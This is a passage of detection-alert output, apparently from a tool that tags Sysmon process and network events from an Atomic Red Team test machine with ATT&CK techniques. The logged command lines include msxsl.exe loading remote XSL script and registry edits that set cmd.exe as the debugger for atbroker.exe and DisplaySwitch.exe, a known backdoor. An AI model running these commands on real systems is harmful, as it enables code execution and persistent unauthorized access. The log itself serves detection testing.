<Data Name=""ParentProcessGuid"">747F3D96-D8CF-5D31-0000-00109B603300</Data>
<Data Name=""ParentProcessId"">5380</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:list&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547856.04777,2019-07-19T18:50:56.047770+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:list&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:55.991996Z"">
</TimeCreated>
<EventRecordID>3762</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:55.978</Data>
<Data Name=""ProcessGuid"">747F3D96-D8CF-5D31-0000-00109B603300</Data>
<Data Name=""ProcessId"">5380</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:list&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1563547856.04777,2019-07-19T18:50:56.047770+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:list&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:55.991996Z"">
</TimeCreated>
<EventRecordID>3762</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:55.978</Data>
<Data Name=""ProcessGuid"">747F3D96-D8CF-5D31-0000-00109B603300</Data>
<Data Name=""ProcessId"">5380</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:list&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547855.991996,2019-07-19T18:50:55.991996+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:53.062635Z"">
</TimeCreated>
<EventRecordID>3761</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:53.038</Data>
<Data Name=""ProcessGuid"">747F3D96-D8CD-5D31-0000-001047543300</Data>
<Data Name=""ProcessId"">1852</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547853.062635,2019-07-19T18:50:53.062635+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:53.011281Z"">
</TimeCreated>
<EventRecordID>3760</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:52.989</Data>
<Data Name=""ProcessGuid"">747F3D96-D8CC-5D31-0000-001038513300</Data>
<Data Name=""ProcessId"">948</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547853.011281,2019-07-19T18:50:53.011281+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:50.086593Z"">
</TimeCreated>
<EventRecordID>3759</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:50.067</Data>
<Data Name=""ProcessGuid"">747F3D96-D8CA-5D31-0000-0010CF443300</Data>
<Data Name=""ProcessId"">6268</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547850.086593,2019-07-19T18:50:50.086593+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:50.046476Z"">
</TimeCreated>
<EventRecordID>3758</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:50.029</Data>
<Data Name=""ProcessGuid"">747F3D96-D8CA-5D31-0000-0010DA413300</Data>
<Data Name=""ProcessId"">4004</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1563547850.046476,2019-07-19T18:50:50.046476+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ams15s30-in-f4.1e100.net ) , IP ( 172.217.17.132 ) and port ( 80 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:25.376030Z"">
</TimeCreated>
<EventRecordID>3757</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3400"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Suspicious NetCon</Data>
<Data Name=""UtcTime"">2019-07-19 14:50:20.871</Data>
<Data Name=""ProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ProcessId"">3912</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
<Data Name=""SourcePort"">49727</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">172.217.17.132</Data>
<Data Name=""DestinationHostname"">ams15s30-in-f4.1e100.net</Data>
<Data Name=""DestinationPort"">80</Data>
<Data Name=""DestinationPortName"">http</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547825.37603,2019-07-19T18:50:25.376030+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:19.549321Z"">
</TimeCreated>
<EventRecordID>3756</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:19.533</Data>
<Data Name=""ProcessGuid"">747F3D96-D8AB-5D31-0000-0010A4D53200</Data>
<Data Name=""ProcessId"">1888</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547819.491237,2019-07-19T18:50:19.491237+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:19.467476Z"">
</TimeCreated>
<EventRecordID>3753</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:19.455</Data>
<Data Name=""ProcessGuid"">747F3D96-D8AB-5D31-0000-001054D03200</Data>
<Data Name=""ProcessId"">6244</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547819.467476,2019-07-19T18:50:19.467476+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:18.009564Z"">
</TimeCreated>
<EventRecordID>3752</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:18.000</Data>
<Data Name=""ProcessGuid"">747F3D96-D8AA-5D31-0000-0010C0C93200</Data>
<Data Name=""ProcessId"">6016</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547817.963904,2019-07-19T18:50:17.963904+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:17.941637Z"">
</TimeCreated>
<EventRecordID>3749</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:17.916</Data>
